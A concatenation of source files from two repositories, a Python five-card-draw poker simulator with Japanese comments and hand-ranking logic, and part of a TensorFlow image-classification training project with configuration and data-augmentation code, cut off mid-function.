"/Engine/Number/Rational.py",
"/Engine/Number/Real.py",
"/Engine/Number/__init__.py",
"/main.py"
] |
00116/PyPlayingCards
|
import random
# カードの数字, マーク, 表示用の文字列を管理するクラス
# allnumber=0~51が1~13のカード4種類ずつ, 52~はjokerを表す
# 標準で数字は1~13, マークは1~4(順にspade, heart, diamond, clubを想定)
# jokerは数字マークともに0
# ace14, two15をTrueにするとAと2の数字がそれぞれ14, 15扱いとなる
class Card:
def __init__(self, allnumber, ace14 = False, two15 = False):
if allnumber >= 52:
self.number = 0
self.suit = 0
self.str = 'joker'
else:
self.number = allnumber % 13 + 1
self.suit = allnumber // 13 + 1
if self.suit == 1:
self.str = 'spade ' + str(self.number)
elif self.suit == 2:
self.str = 'heart ' + str(self.number)
elif self.suit == 3:
self.str = 'daimond ' + str(self.number)
elif self.suit == 4:
self.str = 'club ' + str(self.number)
if ace14 and self.number == 1:
self.number = 14
elif two15 and self.number == 2:
self.number = 15
# 全カードリスト, 山札, 捨て札の管理
# 山札のシャッフル, 山札の初期化, 捨て札を山札に戻す処理を行うクラス
class Table:
def __init__(self, number_of_cards, ace14 = False, two15 = False):
self.card = [Card(i, ace14, two15) for i in range(number_of_cards)]
self.deck = []
self.community = []
self.discard = []
# 山札のシャッフル
def shuffle(self):
self.deck = list(self.deck)
random.shuffle(self.deck)
# 山札の初期化
def deck_initialize(self):
self.deck = list(self.card)
random.shuffle(self.deck)
# 捨て札を山札に戻してシャッフルする
def discard_return_deck(self):
self.deck.extend(self.discard)
self.discard = []
self.shuffle()
'''
class Player:
def __init__(self):
self.hand = []
self.name = ''
self.fivedraw = poker_select.FivecardSelect()
def number_sort(self, reverse = False):
if reverse:
self.hand.sort(reverse = True, key = lambda h: h.number)
else:
self.hand.sort(key = lambda h: h.number)
def suit_sort(self):
self.hand.sort(key = lambda h: h.suit)
def draw(self, deck):
draw_card = deck[0]
self.hand.append(deck[0])
del deck[0]
return draw_card
def throw(self, throw_number, discard):
throw_card = self.hand[throw_number]
discard.append(self.hand[throw_number])
del self.hand[throw_number]
return throw_card
def five_card_draw_throw(self, deck, discard):
throw_num = self.fivedraw.throw_card_choice(self.hand)
throw_cards = []
draw_cards = []
for i in throw_num:
throw_cards.append(self.throw(i, discard))
draw_cards.append(self.draw(deck))
return throw_cards, draw_cards
#def five_card_draw_throw_algorithm(self, discard):
# # 捨てるカードの選択を行う
# # 今は5番目のカードを選択
# throw_card = []
# fixed_hand, rank, rank_str, card_power = poker_system.poker_rank(self.hand)
# self.hand = fixed_hand
# # ストレート以上確定で何も切らない
# if rank > 3:
# return []
# # スリーカードのときは他の2枚を切る
# elif rank == 3:
# for i in range(2):
# throw_card.append(self.throw(3, discard))
# return throw_card
# # ツーペアのときは残り1枚を切る
# elif rank == 2:
# throw_card.append(self.throw(4, discard))
# return throw_card
# # ワンペアのときは残り3枚を切る
# elif rank == 1:
# for i in range(3):
# throw_card.append(self.throw(2, discard))
# return throw_card
# # ブタのときはランダムに1~5枚、数字の小さい物から順に捨てる
# else:
# random_number = random.randint(1, 5)
# for i in range(random_number):
# throw_card.append(self.throw(5 - random_number, discard))
# return throw_card
#throw_card_number = 4
#throw_card = self.throw(throw_card_number)
#return throw_card
'''
--- FILE SEPARATOR ---
import cards_system
import player
import poker_winner
# 5カードドローポーカーの進行を行うクラス
class FiveCardDraw:
# number_of_playersは1~9, number_of_cardsは52以上, turnsは1以上を想定
def __init__(self, number_of_players = 8, number_of_cards = 53, turns = 1):
self.number_of_players = number_of_players
self.number_of_cards = number_of_cards
self.turns = turns
self.table = cards_system.Table(self.number_of_cards, ace14=True)
self.winner = poker_winner.PokerWinner()
self.player = []
for i in range(self.number_of_players):
self.player.append(player.Player())
self.player[i].name = 'player' + str(i + 1)
# ゲーム開始時の処理
def deal(self):
self.table.deck_initialize()
for i in range(self.number_of_players):
for j in range(5):
self.player[i].draw(self.table.deck)
# 1ターンにおける処理
def one_turn(self):
for i in range(self.number_of_players):
# 山札が10枚未満になったときの処理
if len(self.table.deck) < 10:
self.table.discard_return_deck()
print(self.player[i].name)
self.player[i].number_sort(reverse = True)
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
# 捨て札選択、ドローの処理
throwcard, drawcard = self.player[i].five_card_draw_throw(self.table.deck, self.table.discard)
print('throw in ', end='')
print([throwcard[j].str for j in range(len(throwcard))])
print('draw ', end='')
print([drawcard[j].str for j in range(len(drawcard))])
# ゲーム全体の進行
def game(self):
rank = [''] * self.number_of_players
cardpower = [0] * self.number_of_players
self.deal()
for i in range(self.turns):
self.one_turn()
# 最終ターンが終了した際の処理
if i == self.turns - 1:
for i in range(self.number_of_players):
rank[i], cardpower[i] = self.player[i].poker_rank()
print(self.player[i].name + ' ' + rank[i])
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
print('winner ' + self.player[self.winner.poker_winner(cardpower)].name)
'''
class TexasHoldem:
def __init__(self):
self.number_of_players = 4
self.number_of_cards = 52
self.turns = 50
self.player = []
for i in range(self.number_of_players):
self.player.append(cards.Player())
self.player[i].name = 'player' + str(i + 1)
self.table = cards.Table(self.number_of_cards)
def deal(self):
self.table.shuffle()
for i in range(2):
for j in range(self.number_of_players):
self.player[j].draw(self.table.deck)
self.table.community.extend(self.table.deck[0:3])
del self.table.deck[0:3]
def one_turn(self):
for i in range(self.number_of_players + 1):
if len(self.table.deck) < self.number_of_players:
self.table.deck.extend(self.table.discard)
self.table.discard = []
random.shuffle(self.table.deck)
self.table.community.append(self.table.deck[0])
del self.table.deck[0]
for i in range(self.number_of_players + 1):
print(self.player[i].name)
self.player[i].sort_cards()
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
drawcard = self.player[i].draw(self.table.deck)
print('draw ', end='')
print([drawcard[j].str for j in range(len(drawcard))])
def game(self):
self.deal()
rank = [0] * self.number_of_players
rank_str = [0] * self.number_of_players
cardpower = [0] * self.number_of_players
for i in range(self.turns):
self.one_turn()
if i == self.turns - 1:
for i in range(self.number_of_players):
self.player[i].hand, rank[i], rank_str[i], cardpower[i] = rule.poker_rank(self.player[i].hand)
winner, judge = rule.poker_winner(rank, cardpower)
for i in range(self.number_of_players):
print(self.player[i].name + ' ' + rank_str[i])
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
if len(judge):
print('card power judge')
print(judge)
for i in winner:
print('winner ' + self.player[i].name)
'''
--- FILE SEPARATOR ---
import games
game = games.FiveCardDraw()
game.game()
--- FILE SEPARATOR ---
import poker_rank
import random
# 5カードドローポーカーにおける捨て札選択を行うクラス
class FiveCardChoice:
def throw_card_choice(self, hand):
prank = poker_rank.PokerRank()
throw_card = []
rank_str, cardpower = prank.poker_rank(hand)
hand = prank.rank_sort(hand, cardpower)
rank = cardpower[0]
# ストレート以上確定で何も切らない
if rank > 3:
throw_card = []
# スリーカードのときは他の2枚を切る
elif rank == 3:
throw_card = [3, 3]
# ツーペアのときは残り1枚を切る
elif rank == 2:
throw_card = [4]
# ワンペアのときは残り3枚を切る
elif rank == 1:
throw_card = [2, 2, 2]
# ブタのときはランダムに1~5枚、数字の小さい物から順に捨てる
else:
random_number = random.randint(1, 5)
for i in range(random_number):
throw_card.append(5 - random_number)
return hand, throw_card
# 手札とプレイヤー名の管理
# 手札のソート, ドロー, 捨て札選択, 手札の役確認の処理を行うクラス
class Player:
def __init__(self):
self.hand = []
self.name = ''
self.fivedraw = FiveCardChoice()
self.prank = poker_rank.PokerRank()
# カードを数字でソートする 標準では小さい順
def number_sort(self, reverse = False):
if reverse:
self.hand.sort(reverse = True, key = lambda h: h.number)
else:
self.hand.sort(key = lambda h: h.number)
# カードをマークでソートする
def suit_sort(self):
self.hand.sort(key = lambda h: h.suit)
# カードをdeckの0から1枚だけドローする
def draw(self, deck):
draw_card = deck[0]
self.hand.append(deck[0])
del deck[0]
return draw_card
# カードを捨てる
def throw(self, throw_number, discard):
throw_card = self.hand[throw_number]
discard.append(self.hand[throw_number])
del self.hand[throw_number]
return throw_card
# 5カードドローポーカーにおける捨て札選択、ドローの一連の処理を行う
def five_card_draw_throw(self, deck, discard):
self.hand, throw_num = self.fivedraw.throw_card_choice(self.hand)
throw_cards = []
draw_cards = []
for i in throw_num:
throw_cards.append(self.throw(i, discard))
draw_cards.append(self.draw(deck))
return throw_cards, draw_cards
# 手札の役を取得する
def poker_rank(self):
rank, cardpower = self.prank.poker_rank(self.hand)
self.hand = self.prank.rank_sort(self.hand, cardpower)
return rank, cardpower
#throw_card_number = 4
#throw_card = self.throw(throw_card_number)
--- FILE SEPARATOR ---
#from operator import attrgetter
#import itertools
# ポーカーの役判定, 役ベースでの手札のソートを行うクラス
class PokerRank:
# ポーカーの役判定を行う(handが5枚のとき専用)
def poker_rank(self, hand):
flush = False
straight = False
# rankは上がり役の文字列(表示用)
# cardpowerは[0]が役の強さ[1]以降は役が同じときの比較用
rank = ''
cardpower = []
numlist = [0 for i in range(15)]
suitlist = [0 for i in range(5)]
len_numlist = len(numlist)
# 4枚以下の時の処理用(未実装)
len_hand = len(hand)
for i in range(len_hand):
numlist[hand[i].number] += 1
suitlist[hand[i].suit] += 1
# フラッシュの判定
if max(suitlist) + suitlist[0] == 5:
flush = True
straight_numlist = list(numlist)
# ストレートの判定
for i in range(2,11):
if straight_numlist[i] == 1:
for j in range(4):
if straight_numlist[i + j + 1] == 0:
if straight_numlist[0] >= 1:
straight_numlist[i + j + 1] += 1
straight_numlist[0] -= 1
else:
break
if j + 1 == 4:
straight_number = i + j + 1
straight = True
break
# ジョーカーを何のカードとして扱うか決定する
number_of_joker = numlist[0]
numlist[0] = 0
if number_of_joker > 0:
# 前者がスリーカードとフォーカード、後者がワンペアの条件
if max(numlist) >= 3 or numlist.count(2) == 1:
numlist[numlist.index(max(numlist))] += number_of_joker
# ブタとツーペアの時は最も大きい数に重ねる
else:
for i in range(len_numlist):
if numlist[len_numlist - i - 1] > 0:
numlist[len_numlist - i - 1] += number_of_joker
break
# ファイブカードの判定
if 5 in numlist:
rank = 'five of a kind'
cardpower.append(10)
cardpower.append(numlist.index(5))
# ストレートフラッシュの判定
elif flush and straight:
# ロイヤルストレートフラッシュの判定
if numlist[14] == 1:
rank = 'royal flush'
cardpower.append(9)
# 普通のストレートフラッシュの判定
else:
rank = 'straight flush'
cardpower.append(8)
cardpower.append(straight_number)
# フォーカードの判定
elif 4 in numlist:
rank = 'four of a kind'
cardpower.append(7)
cardpower.append(numlist.index(4))
cardpower.append(numlist.index(1))
# フルハウスの判定
elif 3 in numlist and 2 in numlist:
rank = 'full house'
cardpower.append(6)
cardpower.append(numlist.index(3))
cardpower.append(numlist.index(2))
# フラッシュの判定
elif flush:
rank = 'flush'
cardpower.append(5)
for i in range(len_numlist):
# ジョーカー入りのときはジョーカーをAとみなす
temp = len_numlist - i - 1
if numlist[temp] > 1:
for j in range(numlist[temp] - 1):
cardpower.append(14)
cardpower.append(temp)
elif numlist[temp] == 1:
cardpower.append(temp)
# ストレートの判定
elif straight:
rank = 'straight'
cardpower.append(4)
cardpower.append(straight_number)
# スリーカードの判定
elif 3 in numlist:
rank = 'three of a kind'
cardpower.append(3)
cardpower.append(numlist.index(3))
for i in range(len_numlist):
temp = len_numlist - i - 1
if numlist[temp] == 1:
cardpower.append(temp)
# ツーペアの判定
elif numlist.count(2) == 2:
rank = 'two pair'
cardpower.append(2)
for i in range(len_numlist):
temp = len_numlist - i - 1
if numlist[temp] == 2:
cardpower.append(temp)
for i in range(len_numlist):
temp = len_numlist - i - 1
if numlist[temp] == 1:
cardpower.append(temp)
# ワンペアの判定
elif 2 in numlist:
rank = 'a pair'
cardpower.append(1)
cardpower.append(numlist.index(2))
for i in range(len_numlist):
temp = len_numlist - i - 1
if numlist[temp] == 1:
cardpower.append(temp)
# ブタのとき
else:
rank = 'high card'
cardpower.append(0)
for i in range(len_numlist):
temp = len_numlist - i - 1
if numlist[temp] == 1:
cardpower.append(temp)
for i in range(6-len(cardpower)):
cardpower.append(0)
return rank, cardpower
# カードを役ベースでソートする
def rank_sort(self, hand, cardpower):
expect_joker_hand = []
sorted_hand = []
for card in hand:
if card.number == 0:
sorted_hand.append(card)
else:
expect_joker_hand.append(card)
expect_joker_hand.sort(reverse = True, key = lambda h: h.number)
if cardpower[0] == 0:
sorted_hand.extend(expect_joker_hand)
elif cardpower[0] == 1:
for i in range(4):
for card in expect_joker_hand:
if card.number == cardpower[i + 1]:
sorted_hand.append(card)
elif cardpower[0] == 2 or cardpower[0] == 3:
for i in range(3):
for card in expect_joker_hand:
if card.number == cardpower[i + 1]:
sorted_hand.append(card)
elif cardpower[0] == 4 or cardpower[0] == 5:
sorted_hand.extend(expect_joker_hand)
elif cardpower[0] == 6 or cardpower[0] == 7:
for i in range(2):
for card in expect_joker_hand:
if card.number == cardpower[i + 1]:
sorted_hand.append(card)
elif cardpower[0] >= 8:
sorted_hand.extend(expect_joker_hand)
return sorted_hand
'''
def poker_winner(self, cardpower):
converted_cardpower = [list(x) for x in zip(*cardpower)]
max_rank = max(converted_cardpower[0])
if converted_cardpower[0].count(max_rank) == 1:
winner = converted_cardpower[0].index(max_rank)
return winner
else:
for i in range(len(converted_cardpower[0])):
if converted_cardpower[0][i] != max_rank:
cardpower[i] = [0, 0, 0, 0, 0, 0]
converted_cardpower = [list(x) for x in zip(*cardpower)]
for i in range(1, len(converted_cardpower)):
if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
winner = converted_cardpower[i].index(max(converted_cardpower[i]))
return winner
'''
# class PokerWinner:
# def __init__(self, cardpower_list):
# converted_cardpower = [list(x) for x in zip(*cardpower_list)]
# for i in range(len(converted_cardpower)):
# if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
# winner = converted_cardpower[i].index(max(converted_cardpower[i]))
# return winner
"""
class PokerRuleOverSixHand:
# フラッシュの判定
def judge_flush(self, hand, suitlist):
flush_hand = []
max_suit = max(suitlist)
if max_suit >= 5:
for i in range(len(hand)):
if hand[i].suit == max_suit:
flush_hand.append(hand[i])
# ストレートフラッシュの検出用
# flush_numlist = [0 for i in range(15)]
# for i in range(len(flush_numlist)):
# if flush_hand[i].number == 1:
# flush_numlist[14] += 1
# else:
# flush_numlist[flush_hand[i].number] += 1
return flush_hand
def judge_straight(self, hand, numlist):
# numlist = numlist = [0 for i in range(15)]
# for i in range(len_numlist):
# if hand[i].number == 1:
# numlist[14] += 1
# else:
# numlist[hand[i].number] += 1
straight_hand = []
straight_numlist_idx = []
#sorted_hand = sorted(hand, key=attrgetter('number'))
#flag = 0
# for i in range(len(sorted_hand) - 1):
# if sorted_hand[i+1].number - sorted_hand[i].number <= 1:
# flag += 1
# if flag == 4:
# for j in range(flag + 1):
# straight_hand.append(i + 1 - j)
# if sorted_hand[i+1].number - sorted_hand[i].number > 1:
# flag = 0
for i in range(11):
if numlist[i] > 0:
for j in range(4):
if numlist[i + j + 1] == 0:
break
elif j + 1 == 4:
#straight = True
#straight_number = 14 - i
straight_numlist_idx.append([i+k for k in range(5)])
straight_numlist = list(numlist)
for i in range(len_numlist):
if not i in list(itertools.chain.from_iterable(straight_numlist_idx)):
straight_numlist[i] = 0
straight_hand_list = []
for i in range(len(straight_numlist_idx)):
for j in range(len(straight_numlist_idx[i])):
for k in range(len(hand)):
if hand[k].number == straight_numlist_idx[i][j]:
straight_hand.append(hand[k])
straight_hand_list.append(straight_hand)
#for j in range(5):
#if max(numlist[straight_numlist_idx[i][j]]) > 1:
#for i in range(len(hand)):
# if hand[i].number in straight_numlist:
# straight_hand.append(hand[i])
return straight_hand
# def judge_straight_flush(self, flush_hand, straight_hand):
# for straight_card in straight_hand:
# if flush_card in straight_hand
# handの要素数は5~7枚を想定
# 10枚以上で2組フラッシュ、ストレートが発生した場合、
# 8枚以上で2組フォーカードが発生した場合に正常動作しないことが考えられる
def poker_rank(self, hand):
flush = False
straight = False
hand_rank = ''
hand_cardpower = []
suitlist = [0 for i in range(5)]
numlist = [0 for i in range(15)]
hand_result = []
flush_hand = list(hand.sort(key=attrgetter('suit')))
straight_hand = list(hand.sort(key=attrgetter('number')))
for i in range(len_numlist):
if hand[i].number == 1:
numlist[14] += 1
else:
numlist[hand[i].number] += 1
suitlist[hand[i].suit] += 1
flush_hand = self.judge_flush(hand)
straight_hand = self.judge_straight(hand, numlist)
if len(flush_hand) >= 5 and len(straight_hand) >= 5:
straight_flush_hand = self.judge_flush(straight_hand)
else:
straight_flush_hand = []
if numlist[0] > 0:
numlist[numlist.index(max(numlist))] += numlist[0]
numlist[0] = 0
# ファイブカードの判定
if max(numlist) >= 5:
hand_rank = 'five of a kind'
hand_result = [hand[i] for i in range(len(hand)) if hand[i].number == numlist.index(max(numlist))]
# ストレートフラッシュの判定
elif len(straight_flush_hand) >= 5:
straight_number = max(straight_flush_hand, key=attrgetter('number')).number
# ロイヤルストレートフラッシュか判定
if straight_number == 14:
hand_rank = 'royal flush'
hand_cardpower = [9, 14, 13, 12, 11, 10]
hand_result = straight_flush_hand
# 普通のストレートフラッシュの場合
else:
hand_rank = 'straight flush'
hand_cardpower.append(8)
for i in range(5):
hand_cardpower.append(straight_number - i)
hand_result = straight_flush_hand
# フォーカードの判定
elif max(numlist) + numlist[0] >= 4:
hand_rank = 'four of a kind'
hand_result = [hand[i] for i in range(len(hand)) if hand[i].number == numlist.index(max(numlist))]
hand_cardpower = [numlist.index(max(numlist)) for i in range(4)]
for i in range(len(hand)):
if not hand[len(hand) - 1 - i] in hand_result:
hand_result.append(hand[len(hand) - 1 - i])
hand_cardpower.append(hand[len(hand) - 1 - i].number)
# フルハウスの判定
elif 3 in numlist and 2 in numlist:
hand_rank = 'full house'
elif flush:
hand_rank = 'flush'
flush_hand.sort
elif straight:
hand_rank = 'straight'
elif 3 in numlist:
hand_rank = 'three of a kind'
elif numlist.count(2) >= 2:
hand_rank = 'two pair'
elif 2 in numlist:
hand_rank = 'a pair'
else:
hand_rank = 'high card'
return hand_rank, hand_result
def poker_rank(hand):
# 0=ブタ、1=ワンペア、2=ツーペア、3=スリーカード、4=ストレート、5=フラッシュ
# 6=フルハウス、7=フォーカード、8=ストレートフラッシュ、9=ロイヤルストレートフラッシュ
rank = 0
card_power = []
rank_str = ''
fixed_hand = []
# 手札が6枚以上のときも判定できるようにしていた
flush = False
straight = False
straight_flush = False
straight_number = 0
straight_flush_number = 0
suitlist = [0 for i in range(5)]
numberlist = [0 for i in range(14)]
for card in hand:
suitlist[card.suit] += 1
numberlist[card.number] += 1
if max(suitlist) >= 5:
flush = True
flush_numlist = list(numberlist)
for card in hand:
if card.suit != suitlist.index(max(suitlist)):
flush_numlist[card.number] = 0
for i in range(14):
if numberlist[i] > 0:
judge_straight_flush = True
for j in range(4):
if i + j + 1 > 13:
break
if numberlist[i + j + 1] == 0:
break
elif j == 3:
straight = True
straight_number = i + j + 1
if flush:
if flush_numlist[i + j + 1] == 0:
judge_straight_flush = False
for k in range(j + 1):
flush_numlist[k + i] = 0
elif j == 3 and judge_straight_flush:
straight_flush = True
straight_flush_number = i + j + 1
# indexメソッドで強い順にインデックスを取得するためリストを反転
numberlist.reverse()
if straight_flush:
if straight_flush_number == 13:
rank = 9
rank_str = 'royal flush'
for i in range(5):
card_power.append(i)
else:
rank = 8
rank_str = 'straight flush'
for i in range(5):
card_power.append(13 - straight_number + i)
elif max(numberlist) >= 4:
rank = 7
rank_str = 'four of a kind'
for i in range(4):
card_power.append(numberlist.index(max(numberlist)))
temp = list(numberlist)
temp[temp.index(max(temp))] = 0
card_power.append(temp.index(max(temp)))
flush = False
elif 3 in numberlist and 2 in numberlist:
rank = 6
rank_str = 'a full house'
for i in range(3):
card_power.append(numberlist.index(3))
for i in range(2):
card_power.append(numberlist.index(2))
flush = False
elif flush:
rank = 5
rank_str = 'flush'
flush_numlist.reverse()
#for i in range(5):
# card_power.append(flush_numlist.index(1))
for i in range(len(flush_numlist)):
if flush_numlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
elif straight:
rank = 4
rank_str = 'straight'
for i in range(5):
card_power.append(13 - straight_number + i)
elif 3 in numberlist:
rank = 3
rank_str = 'three of a kind'
card_power.append(numberlist.index(3))
card_power.append(numberlist.index(3))
card_power.append(numberlist.index(3))
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
elif numberlist.count(2) == 2:
rank = 2
rank_str = 'two pair'
for i in range(len(numberlist)):
if numberlist[i] == 2:
card_power.append(i)
card_power.append(i)
if len(card_power) == 4:
break
card_power.append(numberlist.index(1))
elif 2 in numberlist:
rank = 1
rank_str = 'a pair'
card_power.append(numberlist.index(2))
card_power.append(numberlist.index(2))
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
else:
rank = 0
rank_str = 'high card'
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
for i in range(len(card_power)):
card_power[i] = 13 - card_power[i]
for j in range(len(hand)):
if hand[j].number == card_power[i] and not hand[j] in fixed_hand:
fixed_hand.append(hand[j])
break
return fixed_hand, rank, rank_str, card_power
def poker_winner(rank, cardpower):
winner = []
card_power_judge = []
if rank.count(max(rank)) == 1:
winner.append(rank.index(max(rank)))
return winner, card_power_judge
else:
player_rank_idx = []
cardpower_tie = []
for j in range(len(rank)):
if rank[j] == max(rank):
player_rank_idx.append(j)
cardpower_tie.append(cardpower[j])
# 2次元配列の行と列を入れ替える
#print(cardpower_tie)
converted_cardpower = [list(x) for x in zip(*cardpower_tie)]
print(converted_cardpower)
#print(converted_cardpower)
for i in range(len(cardpower_tie[0])):
card_power_judge.append(converted_cardpower[i])
if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
#print(player_rank_idx[converted_cardpower[i].index(max(converted_cardpower[i]))])
winner.append(player_rank_idx[converted_cardpower[i].index(max(converted_cardpower[i]))])
return winner, card_power_judge
elif i == len(cardpower_tie[0]) - 1:
winner = [player_rank_idx[converted_cardpower[j].index(max(converted_cardpower[j]))] for j in range(len(cardpower_tie[0]))]
return winner, card_power_judge
"""
--- FILE SEPARATOR ---
# 勝者を決定するクラス
class PokerWinner:
def poker_winner(self, cardpower):
# 2次元配列の行列の変換
converted_cardpower = [list(x) for x in zip(*cardpower)]
max_rank = max(converted_cardpower[0])
# 役だけで勝敗が確定するときの処理
if converted_cardpower[0].count(max_rank) == 1:
winner = converted_cardpower[0].index(max_rank)
return winner
# 役で決まらなかった場合は最強役以外のプレイヤーのcardpowerを全て0にする
else:
for i in range(len(converted_cardpower[0])):
if converted_cardpower[0][i] != max_rank:
cardpower[i] = [0, 0, 0, 0, 0, 0]
converted_cardpower = [list(x) for x in zip(*cardpower)]
# cardpowerを比較し勝敗を決定する
# 完全に同じ場合はプレイヤー番号が若い方が勝者となる
for i in range(1, len(converted_cardpower)):
if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
winner = converted_cardpower[i].index(max(converted_cardpower[i]))
return winner
|
[
"/cards_system.py",
"/games.py",
"/main.py",
"/player.py",
"/poker_rank.py",
"/poker_winner.py"
] |
0011nj/train_arch
|
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
# inception_v4:299
# resnet_v2:224
# vgg:224
IMAGE_HEIGHT = 299
IMAGE_WIDTH = 299
num_classes = 4
# epoch
epoch = 1000
batch_size = 1
# 模型的学习率
learning_rate = 0.00001
keep_prob = 0.8
# 设置训练样本的占总样本的比例:
train_rate = 0.9
# 每个类别保存到一个文件中,放在此目录下,只要是二级目录就可以。
craterDir = "sample_train"
# 选择需要的模型
# arch_model="arch_inception_v4";
# arch_model="arch_resnet_v2_50"
# arch_model="vgg_16"
arch_model="arch_inception_v4"
# 设置要更新的参数和加载的参数,目前是非此即彼,可以自己修改哦
checkpoint_exclude_scopes = "Logits_out"
# 迁移学习模型参数, 下载训练好模型:https://github.com/MachineLP/models/tree/master/research/slim
# checkpoint_path="pretrain/inception_v4/inception_v4.ckpt";
# checkpoint_path="pretrain/resnet_v2_50/resnet_v2_50.ckpt"
checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"
#训练好的模型参数在model文件夹下。
# 接下来可以添加的功能:
# 图像归一化:默认的是归一化到[-1,1]:(load_image/load_image.py:get_next_batch_from_path) (可以自行加一些设置参数,在此处设置)
# 需要加入模型 需修改 (train_net/train.py)
# 设置GPU使用, train_net/train.py (多GPU), main.py
# 设置学习率衰减:learningRate_1 = tf.train.exponential_decay(lr1_init, tf.subtract(global_step, 1), decay_steps, decay_rate, True)
# 加入tensorboard 可视化
# 需要修改参数更新的方法请参考:(train_net/train.py)
'''
def _configure_optimizer(learning_rate):
"""Configures the optimizer used for training.
Args:
learning_rate: A scalar or `Tensor` learning rate.
Returns:
An instance of an optimizer.
Raises:
ValueError: if FLAGS.optimizer is not recognized.
"""
if FLAGS.optimizer == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate,
rho=FLAGS.adadelta_rho,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate,
initial_accumulator_value=FLAGS.adagrad_initial_accumulator_value)
elif FLAGS.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate,
beta1=FLAGS.adam_beta1,
beta2=FLAGS.adam_beta2,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'ftrl':
optimizer = tf.train.FtrlOptimizer(
learning_rate,
learning_rate_power=FLAGS.ftrl_learning_rate_power,
initial_accumulator_value=FLAGS.ftrl_initial_accumulator_value,
l1_regularization_strength=FLAGS.ftrl_l1,
l2_regularization_strength=FLAGS.ftrl_l2)
elif FLAGS.optimizer == 'momentum':
optimizer = tf.train.MomentumOptimizer(
learning_rate,
momentum=FLAGS.momentum,
name='Momentum')
elif FLAGS.optimizer == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(
learning_rate,
decay=FLAGS.rmsprop_decay,
momentum=FLAGS.rmsprop_momentum,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise ValueError('Optimizer [%s] was not recognized', FLAGS.optimizer)
return optimizer'''
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
import numpy as np
import os
from PIL import Image
import cv2
from skimage import exposure
# 完成图像的左右镜像
def random_flip(image, random_flip=True):
if random_flip and np.random.choice([True, False]):
image = np.fliplr(image) # 左右
if random_flip and np.random.choice([True, False]):
image = np.flipud(image) # 上下
return image
# 改变光照
# 光照调节也可以用log, 参数调节和gamma相反;
# img = exposure.adjust_log(img, 1.3)
'''
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.1) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.3) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.5) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.9) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.8) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.7) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.5) # 调亮
'''
def random_exposure(image, random_exposure=True):
if random_exposure and np.random.choice([True, False]):
e_rate = np.random.uniform(0.5,1.5)
image = exposure.adjust_gamma(image, e_rate)
return image
def random_rotation(image, random_rotation=True):
if random_rotation and np.random.choice([True, False]):
w,h = image.shape[1], image.shape[0]
# 0-180随机产生旋转角度。
angle = np.random.randint(0,10)
RotateMatrix = cv2.getRotationMatrix2D(center=(image.shape[1]/2, image.shape[0]/2), angle=angle, scale=0.7)
# image = cv2.warpAffine(image, RotateMatrix, (w,h), borderValue=(129,137,130))
image = cv2.warpAffine(image, RotateMatrix, (w,h), borderMode=cv2.BORDER_REPLICATE)
return image
def random_crop(image, crop_size=299, random_crop=True):
if random_crop and np.random.choice([True, False]):
if image.shape[1] > crop_size:
sz1 = image.shape[1] // 2
sz2 = crop_size // 2
diff = sz1 - sz2
(h, v) = (np.random.randint(0, diff + 1), np.random.randint(0, diff + 1))
image = image[v:(v + crop_size), h:(h + crop_size), :]
return image
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
import numpy as np
import os
from PIL import Image
import cv2
try:
from data_aug import random_flip, random_exposure, random_rotation, random_crop
except:
from data_aug.data_aug import random_flip, random_exposure, random_rotation, random_crop
# 适用于二级目录 。。。/图片类别文件/图片(.png ,jpg等)
def load_img_path(imgDir,imgFoldName, img_label):
imgs = os.listdir(imgDir+imgFoldName)
imgNum = len(imgs)
data = []
label = []
for i in range (imgNum):
img_path = imgDir+imgFoldName+"/"+imgs[i]
# 用来检测图片是否有效,放在这里会太费时间。
# img = cv2.imread(img_path)
# if img is not None:
data.append(img_path)
label.append(int(img_label))
return data,label
def shuffle_train_data(train_imgs, train_labels):
index = [i for i in range(len(train_imgs))]
np.random.shuffle(index)
train_imgs = np.asarray(train_imgs)
train_labels = np.asarray(train_labels)
train_imgs = train_imgs[index]
train_labels = train_labels[index]
return train_imgs, train_labels
def load_database_path(imgDir):
img_path = os.listdir(imgDir)
train_imgs = []
train_labels = []
for i, path in enumerate(img_path):
craterDir = imgDir + '/'
